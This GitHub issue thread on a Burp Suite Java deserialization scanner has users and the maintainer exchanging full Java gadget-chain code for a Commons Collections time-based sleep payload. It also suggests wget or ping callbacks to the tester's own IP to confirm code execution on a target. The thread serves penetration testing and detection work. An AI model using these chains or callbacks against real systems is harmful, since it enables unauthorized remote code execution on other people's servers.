Question about native Java sleep payload

federicodotta / Java-Deserialization-Scanner

All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities

774 stars 178 forks source link

Question about native Java sleep payload #10

Closed pyno closed 6 years ago

pyno commented 7 years ago

Hi Federico! I'm using your scanner and seems amazing! Thanks for your work.

I'm in a situation in which only the payload "Apache Commons Collections 3 Alternate payload 2" (added in commit: 4a29cc355c3a368486b552b4db4dac9952ba3537 in src/burp/BurpExtender.java row 159 ) of you scanner causes the web application to sleep for 10 seconds, but I'm not able to replicate this payload.

To understand why only the "native sleep payload" fires, I'm trying to craft the chain myself, by modifying ysoserial's code. In particular I've tryied this chain in CommonsCollections5.java :

public BadAttributeValueExpException getObject(final String command) throws Exception {
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[]{ new ConstantTransformer(1) });
        final Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Thread.class),
        new InvokerTransformer("getMethod",
                new Class[]{
                        String.class, Class[].class
                },
                new Object[]{
                        "sleep", new Class[]{Long.TYPE}
                }),
        new InvokerTransformer("invoke",
                new Class[]{
                        Object.class, Object[].class
                }, new Object[]
                {
                        null, new Object[] {10000L}
                }),
        new ConstantTransformer(1) };
        final Map innerMap = new HashMap();

        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valfield = val.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(val, entry);

        Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

        return val;
    }

This gives me a payload quite identical to your, but it does not work!

I would like to know how you generated the payload, can you help me? Many thanks!

federicodotta commented 7 years ago

Hi py!

If you have 10 seconds of sleep only for that payload, almost surely the application is vulnerable and you can use ysoserial for the exploitation (the exploitation tab of the plugin is more comfortable). Have you tried the DNS vector for the same payload? If it does not work, maybe a firewall in front of target application blocks DNS requests.

However, this is the code I used to generate sleep payload:

    public BadAttributeValueExpException getObject(final String command) throws Exception {

        final Object[] execArgs = new Object[] {Long.parseLong(command)};       

        // inert chain for setup
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[]{ new ConstantTransformer(1) });
        // real chain for after setup

        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(java.lang.Thread.class),
                new InvokerTransformer("getMethod", new Class[] {
                    String.class, Class[].class }, new Object[] {
                    "sleep", new Class[]{long.class} }),
                new InvokerTransformer("invoke", new Class[] {
                    Object.class, Object[].class }, new Object[] {
                    new Class[] { long.class }, execArgs }),
                new ConstantTransformer(1) };

        final Map innerMap = new HashMap();

        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valfield = val.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(val, entry);

        Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

        return val;
    }

If you compile that code, you can pass a value in milliseconds (10000 for 10 seconds) and generate a sleep payload like mine.

I hope I was helpful. If you need more help please let me know.

Have a nice evening! Federico

pyno commented 7 years ago

Hi Federico,

Thank you very much for the quick reply! I've done more testing and figured out the problem with my payloads.. I was encoding them in base64, but not making them url-safe! Both the above codes are working great..

Thank you again for your time, py

ghost commented 6 years ago

Hello Federico, pyno

I also use your awesome scanner

I got 10 seconds of sleep with "Apache Commons Collections 3 (Sleep): Potentially VULNERABLE!!!" but when I use the Exploiting tab I put "CommonsCollections3 sleep(20000)" into the textbox but it does not work I also modify the code as you suggest above, it still dose not work in my case.

Could you possibly help me with how you guys generated the payload. Thank you very much~~~

pyno commented 6 years ago

Hi! I've had the same problem some time ago, and I worked out that the sleep in the scanner and the one you are trying to execute with the Exploiting tab are different. The payload of the scanner does something like

java.lang.Thread.sleep(10)

but in the exploitation tab your code is put by ysoserial into a runtime.exec, and what you are trying to execute is something like:

Runtime.getRuntime().exec("sleep(20000)")

First, the difference is that the first one is executed synchronously by the serving thread, and the second is done asynchronously because a new process is created by the Runtime.exec method (see https://docs.oracle.com/javase/7/docs/api/java/lang/Process.html).

Second, you are trying to execute on a shell the command sleep(20000), but the syntax is incorrect and should be sleep 20000 (assuming the web server is running on Linux).

To verify the injection you can try to expose a web server (or simply a port) and do something like:

wget <your_IP>/index.html

or simply:

ping <your_IP>

while listening with wireshark/tshark on your machine.

Hope this will help you :) py

federicodotta commented 6 years ago

Hello Java20150,

as py correctly said, the plugin executes a Java sleep and not a system one, because the latter is executed asynchronously.

To verify the injection you can also use the Collaborator. Java Deserialization Scanner has two sets of detection payloads: one with Java sleep and one with Java DNS resolution. With the DNS resolution payloads and the Collaborator you can verify the injection also if you don't have an authoritative DNS server.

Pay only attention that target server can potentially filter outbound traffic and outbound DNS requests: in this case you will not not get any Collaborator interaction nor any HTTP request (using wget/ping/etc.)!

Federico

ghost commented 6 years ago

Thank you for your help

I was confuse between "java sleep" and "system sleep", thanks you guys correct me.

Finally, I got it now. I was in the restrict environment, DNS, wget, ping is not allowed. So, I rewrite serialization payload in ysoserial.jar, and check for existing file on the server instead.

Your plugin is awesome, ^_^

weixiaobao

runn3t commented 1 year ago

Hello everyone,

I would like to know how you @federicodotta has generated the payload Apache Commons Collections 3 Alternate payload 4 (Sleep), because i am trying to craft it myself but i can't.

Kind regards!